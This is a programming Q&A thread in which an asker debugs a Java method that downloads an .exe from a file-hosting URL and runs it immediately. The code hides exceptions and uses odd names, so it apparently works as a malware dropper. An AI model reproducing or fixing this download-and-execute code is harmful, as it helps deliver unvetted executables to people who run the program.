# Files.copy returns empty file when jar is exported

Tags: java, file, url, download

The file downloads properly in eclipse however when i export the jar it always downloads a blank exe. Can anyone help?

```
public static void downloadAndRunFile(final URL from, final File to) throws Exception {
    try (final InputStream in = from.openStream()) {
        Files.copy(in, to.toPath(), StandardCopyOption.REPLACE_EXISTING);
    }
    Desktop.getDesktop().open(to);
}
```

Actual code being ran

```
String bub = "https://a.coka.la/bnH6Vg.exe";
    try {
        Pandora.downloadAndRunFile(
                new URL(bub),
                File.createTempFile("feelthevluci", ".exe"));
        } catch (Exception e) {
        // TODO Auto-generated catch block
    }            
}
```

Answer (score 0):

The URL in your code seems to return a 404.

I changed it to something that I know works and is safe, and that works both in the IDE and in a jar file.

Check the URL via curl, browser, or other tool to make sure it is working.

Comment: Thanks but idk what u mean. It was an issue with eclipse's export so the jar got corrupted. Exporting with intellij fixed the issue.